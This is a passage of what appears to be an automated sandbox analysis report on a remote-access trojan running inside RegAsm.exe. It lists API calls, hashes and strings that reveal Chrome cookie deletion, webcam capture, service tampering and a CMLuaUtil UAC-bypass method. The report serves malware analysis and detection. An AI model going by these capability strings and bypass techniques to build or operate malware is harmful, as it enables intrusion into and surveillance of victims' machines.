                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                          APIs
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                          • int.LIBCPMT ref: 004111BE
                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                          • String ID: (mG
                                                                                                                          • API String ID: 2536120697-4059303827
                                                                                                                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                          APIs
                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                          • CoUninitialize.OLE32 ref: 00407664
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                          • API String ID: 3851391207-1839356972
                                                                                                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                          • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                          Strings
                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                          • UserProfile, xrefs: 0040BAE8
                                                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                          • API String ID: 2018770650-304995407
                                                                                                                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                          Strings
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                                          • 02x, xrefs: 004076D2
                                                                                                                          • Rmc-EPF38I, xrefs: 00407715
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 02x$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-EPF38I
                                                                                                                          • API String ID: 0-3877295654
                                                                                                                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                          APIs
                                                                                                                          • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                          • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                          • __allrem.LIBCMT ref: 0043AD51
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1992179935-0
                                                                                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prologSleep
                                                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                          • API String ID: 3469354165-3054508432
                                                                                                                          • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                          • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __cftoe
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4189289331-0
                                                                                                                          • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                          • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 10001607
                                                                                                                          • _strcat.LIBCMT ref: 1000161D
                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1922816806-0
                                                                                                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3594823470-0
                                                                                                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 493672254-0
                                                                                                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                          • _free.LIBCMT ref: 004482CC
                                                                                                                          • _free.LIBCMT ref: 004482F4
                                                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                          • _abort.LIBCMT ref: 00448313
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3160817290-0
                                                                                                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                          • _free.LIBCMT ref: 10005B2D
                                                                                                                          • _free.LIBCMT ref: 10005B55
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                          • _abort.LIBCMT ref: 10005B74
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3160817290-0
                                                                                                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 221034970-0
                                                                                                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 221034970-0
                                                                                                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                          Memory Dump Source
